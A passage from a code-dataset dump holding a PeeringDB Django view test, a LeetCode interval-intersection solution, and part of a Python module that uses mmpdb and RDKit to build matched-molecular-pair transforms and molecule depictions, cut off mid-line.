models.Organization.objects.create(name=\"Test org\", status=\"ok\")\n cls.org_other = models.Organization.objects.create(\n name=\"Test org other\", status=\"ok\"\n )\n\n # create test entities\n for tag in cls.entities:\n kwargs = {\"name\": \"Test %s\" % tag, \"status\": \"ok\", \"org\": cls.org}\n if tag == \"net\":\n kwargs.update(asn=1)\n setattr(cls, tag, models.REFTAG_MAP[tag].objects.create(**kwargs))\n\n # add org_admin user to org as admin\n cls.org.admin_usergroup.user_set.add(cls.org_admin)\n\n # add user_a user to org as member\n cls.org.usergroup.user_set.add(cls.user_a)\n cls.org_other.usergroup.user_set.add(cls.user_b)\n\n def setUp(self):\n self.factory = RequestFactory()\n\n def run_view_test(self, reftag):\n id = getattr(self, reftag).id\n # test #1 - not logged in\n c = Client()\n resp = c.get(\"/%s/%d\" % (reftag, id), follow=True)\n self.assertEqual(resp.status_code, 200)\n\n # test #2 - guest logged in (not affiliated to any org)\n c = Client()\n c.login(username=\"guest\", password=\"guest\")\n resp = c.get(\"/%s/%d\" % (reftag, id), follow=True)\n self.assertEqual(resp.status_code, 200)\n\n # test #3 - user logged in\n c = Client()\n c.login(username=\"user_a\", password=\"user_a\")\n resp = c.get(\"/%s/%d\" % (reftag, id), follow=True)\n self.assertEqual(resp.status_code, 200)\n\n\nclass TestExchangeView(ViewTestCase):\n def test_view(self):\n self.run_view_test(\"ix\")\n\n\nclass TestFacilityView(ViewTestCase):\n def test_view(self):\n self.run_view_test(\"fac\")\n\n\nclass TestCarrieriew(ViewTestCase):\n def test_view(self):\n self.run_view_test(\"carrier\")\n\n\nclass TestCampusView(ViewTestCase):\n def test_view(self):\n self.run_view_test(\"campus\")\n\n\nclass TestOrgView(ViewTestCase):\n def test_view(self):\n self.run_view_test(\"org\")\n\n\nclass TestNetworkView(ViewTestCase):\n @classmethod\n def setUpTestData(cls):\n ViewTestCase.setUpTestData()\n # Create PoCs\n models.NetworkContact.objects.create(\n network=cls.net,\n visible=\"Users\",\n name=\"Contact Users\",\n phone=\"12345\",\n email=\"a@a.a\",\n status=\"ok\",\n )\n models.NetworkContact.objects.create(\n network=cls.net,\n visible=\"Public\",\n name=\"Contact Public\",\n phone=\"12345\",\n email=\"a@a.a\",\n status=\"ok\",\n )\n models.NetworkContact.objects.create(\n network=cls.net,\n visible=\"Private\",\n name=\"Contact Private\",\n phone=\"12345\",\n email=\"a@a.a\",\n status=\"ok\",\n )\n\n def test_view(self):\n self.run_view_test(\"net\")\n\n def test_poc_notify(self):\n \"\"\"\n Test that viewers are notified if PoCs are hidden from them\n \"\"\"\n\n TEXT_NOT_LOGGED_IN = \"Some of this network's contacts are hidden because they are only visible to authenticated users and you are currently not logged in.\"\n TEXT_NOT_VERIFIED = \"Some of this network's contacts are hidden because your user account is not affiliated with any organization.\"\n\n self.assertEqual(models.NetworkContact.objects.all().count(), 3)\n\n # test #1 - not logged in\n c = Client()\n resp = c.get(\"/net/%d\" % self.net.id, follow=True)\n content = resp.content.decode(\"utf-8\")\n self.assertEqual(resp.status_code, 200)\n assert resp.status_code == 200\n assert TEXT_NOT_LOGGED_IN in content\n assert \"Contact Public\" in content\n assert \"Contact Private\" not in content\n assert \"Contact Users\" not in content\n\n # test #2 - guest logged in (not affiliated to any org)\n c = Client()\n c.login(username=\"guest\", password=\"guest\")\n resp = c.get(\"/net/%d\" % self.net.id)\n content = resp.content.decode(\"utf-8\")\n assert resp.status_code == 200\n assert TEXT_NOT_VERIFIED in content\n assert \"Contact Public\" in content\n assert \"Contact Private\" not in content\n assert \"Contact Users\" not in content\n\n # test #3 - user logged in\n c = Client()\n c.login(username=\"user_a\", password=\"user_a\")\n resp = c.get(\"/net/%d\" % self.net.id)\n content = resp.content.decode(\"utf-8\")\n assert resp.status_code == 200\n assert TEXT_NOT_LOGGED_IN not in content\n assert TEXT_NOT_VERIFIED not in content\n\n assert \"Contact Public\" in content\n assert \"Contact Private\" in content\n assert \"Contact Users\" in content\n\n def test_search_asn_redirect(self):\n \"\"\"\n When the user types AS*** or ASN*** and hits enter, if\n a result is found it should redirect directly to the result\n \"\"\"\n\n c = Client()\n\n for q in [\"as1\", \"asn1\", \"AS1\", \"ASN1\"]:\n resp = c.get(f\"/search?q={q}\", follow=True)\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(resp.redirect_chain, [(f\"/net/{self.net.id}\", 302)])\n","repo_name":"peeringdb/peeringdb","sub_path":"tests/test_entity_view.py","file_name":"test_entity_view.py","file_ext":"py","file_size_in_byte":6298,"program_lang":"python","lang":"en","doc_type":"code","stars":318,"dataset":"github-code","pt":"53"} +{"seq_id":"21454123225","text":"from typing import List\n\nclass Solution:\n def intervalIntersection(self, firstList: List[List[int]], secondList: List[List[int]]) -> List[List[int]]:\n m, n = len(firstList), len(secondList)\n ans: List[List[int]] = []\n i, j = 0, 0\n while i < m and j < n:\n s = max(firstList[i][0], secondList[j][0])\n e = min(firstList[i][1], secondList[j][1])\n if s <= e:\n ans.append([s, e])\n if firstList[i][1] < secondList[j][1]:\n i += 1\n else:\n j += 1\n return ans","repo_name":"jerrt2003/leetcode-in-python","sub_path":"986_Interval_List_Intersections/layoff.py","file_name":"layoff.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9312146438","text":"import base64\nimport gzip\nimport json\nimport multiprocessing\nimport sys\nfrom array import array\nfrom typing import List, NamedTuple, Union, Optional, Tuple\n\ntry:\n from mmpdblib import commandline as mmp, command_support, dbutils, analysis_algorithms\nexcept ImportError:\n from mmpdblib import cli as mmp, dbutils, analysis_algorithms\n from mmpdblib.analysis_algorithms import get_transform_tool\nfrom mmpdblib.analysis_algorithms import TransformResult\nfrom mmpdblib.dbutils import open_database, DBFile\nfrom rdkit import Chem\nfrom rdkit.Chem import AllChem\nfrom rdkit.Chem.rdchem import Mol, RWMol, BondType, Atom, BondStereo, Bond, Conformer\nfrom rdkit.Geometry.rdGeometry import Point3D\n\nfrom ruse.rdkit.rdkit_utils import RDKitFormat\nfrom ruse.rdkit.mcs import mcs_with_constant_smiles, mcs_match_fragments\nfrom ruse.rdkit.rdkit_utils import encode_mol, rescale_bond_lengths\nfrom ruse.util.data_table import DataTable\n\n\nclass MmpTransformProduct(NamedTuple):\n \"\"\"\n Base class for transform identified by mmpdb\n\n Attributes:\n\n - from_smiles: smiles with mapped wildcard atoms encoding variable part of query\n\n - to_smiles: smiles with mapped wildcard atoms encoding variable part of product\n\n - query: :class:`rdkit.Chem.rdchem.Mol` molecule containing query molecule. Annotated with bonds broken and variable core\n\n - product: :class:`rdkit.Chem.rdchem.Mol` molecule containing product molecule. Annotated with bonds broken and variable core\n\n - reversed: set true if the transformation is reversed compared to the database rule\n\n - value: mean numeric difference observed for the transform\n\n - n_pairs: number of pair values that contribute to the mean difference\n\n - radius: radius of match between query and pairs in rule\n\n - rule_environment_id: mmpdb database id for rule\n\n - constant_smiles: smiles for conserved portion of rule\n\n \"\"\"\n from_smiles: str\n to_smiles: str\n query: Mol\n product: Mol\n reversed: bool\n value: float\n n_pairs: int\n radius: int\n rule_environment_id: int\n constant_smiles: str\n query_reference_missing: List[int]\n\n\nclass RadiusAndRuleGroup(NamedTuple):\n rule_env_id: int\n radius: int\n query: Mol\n product: Mol\n from_smiles: str\n to_smiles: str\n constant_smiles: str\n properties: List[float]\n query_reference_missing: List[int]\n\n def to_grid_row(self, molecules: bool = False, include_constant_smiles: bool = False,\n build_fingerprints: bool = False, reference_query: Mol = None) -> List:\n if molecules:\n values = [self.query, self.product, Chem.MolFromSmiles(self.from_smiles),\n Chem.MolFromSmiles(self.to_smiles), self.radius, self.rule_env_id]\n else:\n values = [encode_mol(RDKitFormat.sdf, self.query), encode_mol(RDKitFormat.sdf, self.product),\n self.from_smiles, self.to_smiles, self.radius, self.rule_env_id]\n values = values + self.properties\n if build_fingerprints and reference_query:\n values.append(build_fingerprint(reference_query, self.query, 'variable'))\n if include_constant_smiles:\n values.append(self.constant_smiles)\n if build_fingerprints and reference_query:\n values.append(build_fingerprint(reference_query, self.query))\n return values\n\n\nclass MmpProduct(NamedTuple):\n \"\"\"\n Class to store a query and product and associated transforms. There will be one transform for each property\n requested\n\n Attributes:\n\n - query: query molecule of :class:`rdkit.Chem.rdchem.Mol`\n\n - product: product molecule :class:`rdkit.Chem.rdchem.Mol`\n\n - transform_products: A list of :class:`MmpTransformProduct` containing query to product transforms\n\n \"\"\"\n query: Mol\n product: Mol\n transform_products: List[MmpTransformProduct]\n\n def group_by_rule_and_radius(self) -> List[RadiusAndRuleGroup]:\n pairs = list({(-tp.rule_environment_id if tp.reversed else tp.rule_environment_id, tp.radius)\n for tp in self.transform_products if tp})\n groups = []\n for rule_environment_id, radius in pairs:\n transform_product = None\n properties = []\n for tp in self.transform_products:\n if not tp:\n properties.append(None)\n continue\n rule_env_id = -tp.rule_environment_id if tp.reversed else tp.rule_environment_id\n if rule_env_id == rule_environment_id and tp.radius == radius:\n if not transform_product:\n transform_product = tp\n else:\n assert tp.from_smiles == transform_product.from_smiles\n assert tp.to_smiles == transform_product.to_smiles\n properties.append(tp.value)\n else:\n properties.append(None)\n group = RadiusAndRuleGroup(rule_environment_id, radius, transform_product.query, transform_product.product,\n transform_product.from_smiles, transform_product.to_smiles,\n transform_product.constant_smiles, properties,\n transform_product.query_reference_missing)\n groups.append(group)\n return groups\n\n\nclass MmpTransform(NamedTuple):\n \"\"\"\n Class to store all transforms found for a query\n\n Attributes:\n\n - query: query molecule of :class:`rdkit.Chem.rdchem.Mol`\n\n - property_names: A list of the property names fior which MMP delta are requested\n\n - property_ids: MMPDB ids for the property names\n\n - products: List of products for the query as a list of :class:`MmmpProduct` objects\n\n \"\"\"\n\n query: Mol\n property_names: List[str]\n property_ids: List[int]\n products: List[MmpProduct]\n\n def to_data_table(self, input_format: RDKitFormat, input_query: str,\n groups: Optional[List[RadiusAndRuleGroup]] = None) -> DataTable:\n \"\"\"\n Creates a ruse data table (:class:` ruse.util.data_table.DataTable`), with columns for query, product,\n property deltas, rule id and environment radius\n\n :return:\n \"\"\"\n\n if input_format == RDKitFormat.smi:\n query_property = input_query\n elif input_format == RDKitFormat.sdf:\n mol_gzip = gzip.compress(bytes(input_query, 'utf-8'))\n query_property = base64.b64encode(mol_gzip).decode('utf-8')\n else:\n raise ValueError('Unknown mmp query type {}'.format(input_format.name))\n\n columns = [DataTable.column_definition('Query', 'binary', 'chemical/x-mdl-molfile',\n properties={'mmpInputQuery': query_property}),\n DataTable.column_definition('Product', 'binary', 'chemical/x-mdl-molfile'),\n DataTable.column_definition('FROM', 'string', 'chemical/x-smiles'),\n DataTable.column_definition('TO', 'string', 'chemical/x-smiles'),\n DataTable.column_definition('RADIUS', 'int'),\n DataTable.column_definition('ENV_RULE', 'int')]\n\n for p in self.property_names:\n property_column = DataTable.column_definition(p, 'float', properties={'mmpPropertyColumn': 'true'})\n columns.append(property_column)\n\n columns.append(\n DataTable.column_definition('TransformFingerprint', 'binary', 'application/octet-stream'))\n columns.append(DataTable.column_definition('Fingerprint', 'binary', 'application/octet-stream'))\n\n rows = self.to_grid(build_fingerprints=True, groups=groups)\n data_table = DataTable(columns=columns, data=rows)\n return data_table\n\n def to_split_files(self, input_format: RDKitFormat, input_query: str):\n\n file_no = 0\n atom_ids_to_file = {}\n file_groups = {}\n rows = []\n\n for p in self.products:\n for group in p.group_by_rule_and_radius():\n query_ids = tuple(group.query_reference_missing)\n if query_ids in atom_ids_to_file:\n file = atom_ids_to_file[query_ids]\n else:\n file = \"mmp_data_table_{}.json\".format(file_no)\n file_no += 1\n atom_ids_to_file[query_ids] = file\n fingerprint = build_fingerprint_from_atoms(self.query, group.query_reference_missing)\n group_list = file_groups.setdefault(file, [])\n group_no = len(group_list)\n group_list.append(group)\n rows.append([file, group_no, fingerprint])\n\n file_data_tables = {file: self.to_data_table(input_format, input_query, groups=groups) for file, groups in\n file_groups.items()}\n for file, data_table in file_data_tables.items():\n with open(file, 'w', encoding='utf8') as fh:\n json.dump(data_table.to_data(), fh)\n\n columns = [DataTable.column_definition('File', 'string'),\n DataTable.column_definition('Row', 'int'),\n DataTable.column_definition('Fingerprint', 'binary', 'application/octet-stream')]\n data_table = DataTable(columns=columns, data=rows)\n return data_table\n\n def to_grid(self, molecules: bool = False, column_major: bool = False, include_constant_smiles: bool = False,\n build_fingerprints: bool = False, groups: Optional[List[RadiusAndRuleGroup]] = None) \\\n -> List[List[Union[str, int, float, Mol]]]:\n\n \"\"\"\n Converts the query and products to a matrix data structure, with columns for query, product,\n property deltas, rule id and environment radius. This can be used to build ruse or pandas\n data tables\n\n :param molecules: Set true to use RDKit molecules for cells containing structures\n :param column_major: Set true for column major indexing (default is row major)\n :return: matrix as list of lists\n \"\"\"\n\n if not groups:\n groups = [g for p in self.products for g in p.group_by_rule_and_radius()]\n rows = [g.to_grid_row(molecules, include_constant_smiles, build_fingerprints, self.query) for g in groups]\n\n return rows if not column_major else [list(c) for c in zip(*rows)]\n\n\ndef map_labelled_atoms_to_reference(reference: Mol, transform: Mol, atom_property: str = 'missing') -> \\\n List[int]:\n mapping = transform.GetSubstructMatch(reference)\n assert mapping\n transform_to_query = {i: m for m, i in enumerate(mapping)}\n labelled_transform_atoms = [atom.GetIdx() for atom in transform.GetAtoms()\n if atom.HasProp(atom_property) and atom.GetBoolProp(atom_property)]\n labelled_reference_atoms = [transform_to_query[t] for t in labelled_transform_atoms]\n for input_idx, transform_idx in zip(labelled_reference_atoms, labelled_transform_atoms):\n assert reference.GetAtomWithIdx(input_idx).GetAtomicNum() == \\\n transform.GetAtomWithIdx(transform_idx).GetAtomicNum()\n labelled_reference_atoms.sort()\n return labelled_reference_atoms\n\n\ndef build_fingerprint_from_atoms(reference_query: Mol, labelled_reference_atoms: List[int]) -> str:\n changed_input_bonds = [bond.GetIdx() for bond in reference_query.GetBonds()\n if bond.GetBeginAtomIdx() in labelled_reference_atoms\n and bond.GetEndAtomIdx() in labelled_reference_atoms]\n data = array('b')\n for i in range(reference_query.GetNumAtoms()):\n val = 0x1 if i in labelled_reference_atoms else 0\n data.append(val)\n for i in range(reference_query.GetNumBonds()):\n val = 0x1 if i in changed_input_bonds else 0\n data.append(val)\n compress_data = gzip.compress(data)\n encoded_data = base64.b64encode(compress_data).decode('utf-8')\n return encoded_data\n\n\ndef atoms_and_bonds_from_fingerprint(reference_query: Mol, fingerprint: str) -> Tuple[List[int], List[int]]:\n compress_data = base64.b64decode(fingerprint.encode('utf-8'))\n data = gzip.decompress(compress_data)\n n_atoms = reference_query.GetNumAtoms()\n assert (len(data) == n_atoms + reference_query.GetNumBonds())\n atoms = [i for i, v in enumerate(data) if i < n_atoms and v == 0x1]\n bonds = [i - n_atoms for i, v in enumerate(data) if i >= n_atoms and v == 0x1]\n return atoms, bonds\n\n\ndef build_fingerprint(reference_query: Mol, transform_query: Mol, atom_property: str = 'missing',\n ) -> str:\n labelled_reference_atoms = map_labelled_atoms_to_reference(reference_query, transform_query, atom_property)\n return build_fingerprint_from_atoms(reference_query, labelled_reference_atoms)\n\n\nclass MmpPair(NamedTuple):\n \"\"\"\n A pair from the MMPDB database\n\n Attributes:\n\n - from_id: database id of LHS of pair\n\n - from_smiles: structure of LHS\n\n - from_property: LHS property value\n\n - to_id: database id of RHS of pair\n\n - to_smiles: structure of RHS\n\n - to_property: RHS property value\n \"\"\"\n from_id: str\n from_smiles: str\n from_property: float\n to_id: str\n to_smiles: str\n to_property: float\n\n\nclass MmpEnvironment(NamedTuple):\n \"\"\"\n Base class to define the pairs for a property transform. This class is only used to validate Ruse webservice\n\n Attributes:\n\n - pairs: a list of pairs used to define a transform\n \"\"\"\n pairs: List[MmpPair]\n\n def delta(self):\n \"\"\"\n Determines overall properta delta from the list of pairs\n\n :return: property difference from transform\n \"\"\"\n diffs = [p.to_property - p.from_property for p in self.pairs]\n mean = sum(diffs) / float(len(diffs))\n return mean\n\n def to_grid(self, molecules: bool = False):\n rows = []\n for p in self.pairs:\n if molecules:\n row = [p.from_id, Chem.MolFromSmiles(p.from_smiles), p.from_property,\n p.to_id, Chem.MolFromSmiles(p.to_smiles), p.to_property]\n else:\n row = [p.from_id, p.from_smiles, p.from_property,\n p.to_id, p.to_smiles, p.to_property]\n rows.append(row)\n return rows\n\n\ndef transform(smiles: str, properties: List[str], database_file: str) -> TransformResult:\n \"\"\"\n A rewrite of :func:`mmpdb.do_analysis.transform_command` to return in-memory transform results rather than\n print them out.\n\n :param smiles: input structure\n :param properties: properties to estimate effect on\n :param database_file: MMP database\n :return: result of the transform\n \"\"\"\n\n # MMPDB 2 stuff:\n try:\n args_in = ['transform', '--smiles', smiles, database_file]\n for p in properties:\n args_in.extend(['--property', p])\n args, _ = mmp.parser.parse_known_args(args_in)\n parser = args.subparser\n min_radius = args.min_radius\n assert min_radius in list(\"012345\"), min_radius\n min_radius = int(min_radius)\n min_pairs = int(args.min_pairs)\n min_variable_size = args.min_variable_size\n min_constant_size = args.min_constant_size\n explain = command_support.get_explain(args.explain)\n dataset = dbutils.open_dataset_from_args_or_exit(args)\n property_names = command_support.get_property_names_or_error(parser, args, dataset)\n\n if args.substructure:\n substructure_pat = Chem.MolFromSmarts(args.substructure)\n if substructure_pat is None:\n parser.error(\"Cannot parse --substructure %r\" % (args.substructure,))\n else:\n substructure_pat = None\n\n # evaluate --where, --score, and --rule-selection-cutoffs.\n rule_selection_function = analysis_algorithms.get_rule_selection_function_from_args(\n parser, args)\n\n transform_tool = analysis_algorithms.get_transform_tool(dataset, rule_selection_function)\n transform_record = transform_tool.fragment_transform_smiles(args.smiles)\n if transform_record.errmsg:\n parser.error(\"Unable to fragment --smiles %r: %s\"\n % (args.smiles, transform_record.errmsg))\n\n if args.jobs > 1:\n pool = multiprocessing.Pool(processes=args.jobs)\n else:\n pool = None\n try:\n result = transform_tool.transform(\n transform_record.fragments, property_names,\n min_radius=min_radius,\n min_pairs=min_pairs,\n min_variable_size=min_variable_size,\n min_constant_size=min_constant_size,\n substructure_pat=substructure_pat,\n pool=pool,\n explain=explain,\n )\n except analysis_algorithms.EvalError as err:\n sys.stderr.write(\"ERROR: %s\\nExiting.\\n\" % (err,))\n raise SystemExit(1)\n\n return result\n except AttributeError:\n # MMPDB3\n db = dbutils.open_database(database_file)\n dataset = db.get_dataset()\n transform_tool = get_transform_tool(dataset)\n transform_record = transform_tool.fragment_transform_smiles(smiles)\n result = transform_tool.transform(transform_record.fragmentations, properties)\n return result\n\ndef create_combined_structure(constant_smiles: str, variable_smiles: str,\n attachment_order: Optional[List[int]] = None) -> Mol:\n \"\"\"\n From constant and variable substructures create combined structure with labelled atoms indicating bond cuts\n and renderer_highlight molecular property to show variable substructure.\n\n :param constant_smiles: constant portion of molecule\n :param variable_smiles: variable portion of molecule\n :param attachment_order: attachment order of variable atoms. If None, the attachment points in the variable_smiles should be numbered\n\n :return: Combined structure as :class:`rdkit.Chem.rdchem.Mol`\n \"\"\"\n constant_mol = Chem.MolFromSmiles(constant_smiles)\n variable_mol = Chem.MolFromSmiles(variable_smiles)\n\n variable_attachment_no = 0\n for variableNo, atom in enumerate(variable_mol.GetAtoms()):\n atom.SetBoolProp('variable', True)\n atom.SetIntProp('variableNo', variableNo)\n if atom.GetAtomicNum() == 0:\n atom.SetProp(\"attachment\", \"variable\")\n if atom.HasProp('molAtomMapNumber'):\n variable_index = atom.GetIntProp('molAtomMapNumber') - 1\n else:\n variable_index = variable_attachment_no\n if attachment_order:\n atom.SetIntProp(\"attachmentIdx\", attachment_order[variable_index])\n else:\n atom.SetIntProp(\"attachmentIdx\", variable_index)\n variable_attachment_no += 1\n\n constant_attachment_no = 0\n for atom in constant_mol.GetAtoms():\n atom.SetBoolProp('variable', False)\n if atom.GetAtomicNum() == 0:\n atom.SetProp(\"attachment\", \"constant\")\n atom.SetIntProp(\"attachmentIdx\", constant_attachment_no)\n constant_attachment_no += 1\n\n if attachment_order:\n assert variable_attachment_no == len(attachment_order)\n assert constant_attachment_no == len(attachment_order)\n\n combine_mol = Chem.CombineMols(constant_mol, variable_mol)\n Chem.SanitizeMol(combine_mol)\n mol = Chem.RWMol(combine_mol)\n n_cuts = constant_attachment_no\n mol.SetIntProp(\"nCuts\", n_cuts)\n\n for index in range(0, variable_attachment_no):\n _join_mols(mol, index)\n\n Chem.SanitizeMol(mol)\n Chem.AssignStereochemistry(mol)\n\n def highlight(atom: Atom) -> bool:\n return atom.HasProp('variable') and atom.GetBoolProp('variable')\n\n def highlight_bond(bond: Bond, highlight_atoms: List[int]) -> bool:\n start = bond.GetBeginAtomIdx()\n end = bond.GetEndAtomIdx()\n return start in highlight_atoms and end in highlight_atoms\n\n cuts_bond_idxs = [_bond_idx_for_cut(mol, cut_no) for cut_no in range(1, n_cuts + 1)]\n\n mol.SetProp(\"bond_cuts\", ' '.join([str(b + 1) for b in cuts_bond_idxs]))\n highlight_atoms = [a.GetIdx() for a in mol.GetAtoms() if highlight(a)]\n highlight_bonds = [b.GetIdx() for b in mol.GetBonds() if highlight_bond(b, highlight_atoms)]\n\n # prop_text = \"COLOR #ff0000\\nATOMS {}\\nBONDS {}\".format(' '.join([str(a + 1) for a in highlight_atoms]),\n # ' '.join([str(b + 1) for b in highlight_bonds]))\n prop_text = \"COLOR #ff0000\\nBONDS {}\".format(' '.join([str(b + 1) for b in highlight_bonds]))\n mol.SetProp('Renderer_Highlight', prop_text)\n\n return Mol(mol)\n\n\ndef _parity_shell(values):\n \"\"\"\n Determines the parity of integers in a list\n\n :param values:\n :return: parity\n \"\"\"\n\n # from http://www.dalkescientific.com/writings/diary/archive/2016/08/15/fragment_parity_calculation.html\n # Simple Shell sort; while O(N^2), we only deal with at most 4 values\n values = list(values)\n N = len(values)\n num_swaps = 0\n for i in range(N - 1):\n for j in range(i + 1, N):\n if values[i] > values[j]:\n values[i], values[j] = values[j], values[i]\n num_swaps += 1\n return num_swaps % 2\n\n\ndef _atom_ordering_before(atom: Atom, old_atom: Atom, new_atom: Atom) -> List[Atom]:\n \"\"\"\n Determine the order of neighbor atoms in the bond table, substituting new_atom for old_atom\n\n :param atom: center atom\n :param old_atom:\n :param new_atom:\n :return: Ordering\n \"\"\"\n env_before = [b.GetOtherAtom(atom) for b in atom.GetBonds()]\n index, _ = next((i, a) for i, a in enumerate(env_before) if a.GetIdx() == old_atom.GetIdx())\n env_before[index] = new_atom\n return env_before\n\n\ndef _check_chirality_after(atom: Atom, env_before: List[Atom]) -> None:\n \"\"\"\n Determine if a chiral inversion has occurred round an atom after creating combined structure\n\n :param atom:\n :param env_before: Ordering prior to merging\n \"\"\"\n ids_after = [b.GetOtherAtomIdx(atom.GetIdx()) for b in atom.GetBonds()]\n ids_before = [a.GetIdx() for a in env_before]\n parity_before = _parity_shell(ids_before)\n parity_after = _parity_shell(ids_after)\n\n if parity_before != parity_after:\n atom.InvertChirality()\n\n\ndef _set_mapping_label(atom: Atom, mapping_no: int) -> None:\n \"\"\"\n Add labels to atoms to indicate a bond the variable substructure\n :param atom:\n :param mapping_no:\n :return:\n \"\"\"\n atom.SetBoolProp('cutNo{}'.format(mapping_no), True)\n if atom.HasProp('molAtomMapNumber'):\n mapping_no = int('{}{}'.format(atom.GetIntProp('molAtomMapNumber'), mapping_no))\n atom.SetAtomMapNum(mapping_no)\n atom.SetIntProp('molAtomMapNumber', mapping_no)\n\n\ndef _find_neighbour_stereo_bond(mol: Mol, atom: Atom, old_atom: Atom, new_atom: Atom) -> Optional[\n Tuple[Bond, List[Atom]]]:\n \"\"\"\n Determines if any trans/cis stereo bonds are affected by the fragment joining. Returns the affected bond and defining atoms\n\n :param mol: molecule\n :param atom: center atom\n :param old_atom: old neighbor atom\n :param new_atom: new neighbor atom\n :return: Tuple of any affected bond and atoms, or None\n \"\"\"\n\n for bond in atom.GetBonds():\n stereo = bond.GetStereo()\n if stereo != BondStereo.STEREONONE:\n stereo_atoms = [mol.GetAtomWithIdx(i) for i in bond.GetStereoAtoms()]\n try:\n index, _ = next((i, a) for i, a in enumerate(stereo_atoms) if a.GetIdx() == old_atom.GetIdx())\n stereo_atoms[index] = new_atom\n except StopIteration:\n # note need to reset stereo bond information even if deleted atom is not in the list of stereo atoms\n pass\n return bond, stereo_atoms\n return None\n\n\ndef _join_mols(mol: RWMol, attachment_no: int) -> None:\n \"\"\"\n Joins two disconnected fragment in the molecule by connecting wildcard atoms for the attachment points\n\n :param mol:\n :param attachment_no:\n \"\"\"\n constant_atom = None\n variable_atom = None\n constant_neighbour = None\n variable_neighbour = None\n\n for atom in mol.GetAtoms():\n\n if atom.GetAtomicNum() == 0:\n\n if atom.HasProp(\"attachment\") and atom.GetProp(\"attachment\") == \"constant\" and atom.GetIntProp(\n \"attachmentIdx\") == attachment_no:\n constant_atom = atom\n neighbours = atom.GetNeighbors()\n assert len(neighbours) == 1\n constant_neighbour = neighbours[0]\n\n if atom.HasProp(\"attachment\") and atom.GetProp(\"attachment\") == \"variable\" and atom.GetIntProp(\n \"attachmentIdx\") == attachment_no:\n variable_atom = atom\n neighbours = atom.GetNeighbors()\n assert len(neighbours) == 1\n variable_neighbour = neighbours[0]\n\n assert constant_atom\n assert variable_atom\n assert constant_neighbour\n assert variable_neighbour\n\n variable_env_before = _atom_ordering_before(variable_neighbour, variable_atom, constant_neighbour)\n constant_env_before = _atom_ordering_before(constant_neighbour, constant_atom, variable_neighbour)\n\n stereo_bonds = {}\n t = _find_neighbour_stereo_bond(mol, variable_neighbour, variable_atom, constant_neighbour)\n if t:\n stereo_bond, stereo_atoms = t\n stereo_bonds[stereo_bond] = stereo_atoms\n t = _find_neighbour_stereo_bond(mol, constant_neighbour, constant_atom, variable_neighbour)\n if t:\n stereo_bond, stereo_atoms = t\n stereo_bonds[stereo_bond] = stereo_atoms\n\n mol.RemoveAtom(constant_atom.GetIdx())\n mol.RemoveAtom(variable_atom.GetIdx())\n mol.AddBond(constant_neighbour.GetIdx(), variable_neighbour.GetIdx(), BondType.SINGLE)\n\n # see Andrew Dalke's blog for how to handle chiral centers on fragmentation\n # http://www.dalkescientific.com/writings/diary/archive/2016/08/14/fragment_chiral_molecules.html#fragment_chiral\n _check_chirality_after(variable_neighbour, variable_env_before)\n _check_chirality_after(constant_neighbour, constant_env_before)\n\n for stereo_bond in stereo_bonds:\n atom_indices = [a.GetIdx() for a in stereo_bonds[stereo_bond]]\n assert len(atom_indices) == 2\n stereo_bond.SetStereoAtoms(atom_indices[0], atom_indices[1])\n\n _set_mapping_label(variable_neighbour, attachment_no + 1)\n _set_mapping_label(constant_neighbour, attachment_no + 1)\n\n\ndef align_combined_molecules(query: Mol, mapped_query_mol: Mol, mapped_product_mol: Mol,\n constant_smiles: str) -> None:\n \"\"\"\n Align the combined query and product molecules to the initial query coordinates for the largest fragment in the\n constant smiles\n\n :param query:\n :param mapped_query_mol:\n :param mapped_product_mol:\n :param constant_smiles:\n \"\"\"\n if mapped_query_mol.HasSubstructMatch(query, useChirality=True):\n AllChem.GenerateDepictionMatching2DStructure(mapped_query_mol, query)\n else:\n AllChem.Compute2DCoords(mapped_query_mol)\n\n template_smiles = constant_smiles.split('.')[0]\n template_mol = Chem.MolFromSmarts(template_smiles)\n map = mapped_query_mol.GetSubstructMatch(template_mol, useChirality=True)\n if mapped_product_mol.HasSubstructMatch(template_mol, useChirality=True) \\\n and map:\n template_conformer = Conformer(template_mol.GetNumAtoms())\n query_conformer = mapped_query_mol.GetConformer(0)\n for template_no, query_no in enumerate(map):\n query_point = query_conformer.GetAtomPosition(query_no)\n # print('x {} y {} z {}'.format(query_point.x, query_point.y, query_point.z))\n template_conformer.SetAtomPosition(template_no, Point3D(query_point.x, query_point.y, query_point.z))\n template_mol.AddConformer(template_conformer)\n AllChem.GenerateDepictionMatching2DStructure(mapped_product_mol, template_mol)\n else:\n AllChem.Compute2DCoords(mapped_product_mol)\n\n\ndef result_to_mmp_transform(query: Mol, result: TransformResult) -> MmpTransform:\n \"\"\"\n Map the data structures returned from an MMPDB query search to our own data structures.\n\n :param query:\n :param result:\n :return:\n \"\"\"\n\n if not query.GetNumConformers():\n AllChem.Compute2DCoords(query)\n else:\n rescale_bond_lengths(query)\n\n property_ids, properties = zip(*result.property_info_list)\n products = []\n last_from_smiles = None\n last_to_smiles = None\n last_constant_smiles = None\n\n for product_no, tp in enumerate(result.transform_products):\n product_smiles = tp.smiles\n transform_products = []\n has_product_with_rule = False\n for rule in tp.property_rules:\n\n if not rule or not rule.property_rule:\n transform_products.append(None)\n continue\n\n has_product_with_rule = True\n reversed = True if rule.property_rule and rule.is_reversed == 1 else False\n from_smiles = add_attachment_order_to_smiles(rule.variable_smiles)\n # for multiple properties the previous product will often be the same as this one. If it is reuse it\n previous_matches = last_from_smiles == from_smiles and last_to_smiles == rule.to_smiles \\\n and last_constant_smiles == rule.constant_smiles\n\n if not previous_matches:\n\n # create combined structure with labeled variable atoms and attachment points\n mapped_query_mol = create_combined_structure(rule.constant_smiles, from_smiles)\n mapped_product_mol = create_combined_structure(rule.constant_smiles, rule.to_smiles)\n\n # align around constant core for depiction\n align_combined_molecules(query, mapped_query_mol, mapped_product_mol, rule.constant_smiles)\n\n # identify a reasonable minimal difference between query and product. This is usually some subset of\n # the from_smiles pattern. We can look for differences in just the transform or in the whole molecule.\n # whole molecule MCSs are better, but slower. There are some edge cases where it is not possible to get\n # a reasonable difference without looking at the whole molecule.\n whole_molecule_mcs = False\n if whole_molecule_mcs:\n mapping = mcs_with_constant_smiles(mapped_query_mol, mapped_product_mol, rule.constant_smiles)\n query_mapping, _ = list(zip(*mapping))\n query_missing = [a for a in range(mapped_query_mol.GetNumAtoms()) if a not in query_mapping]\n else:\n from_mol = 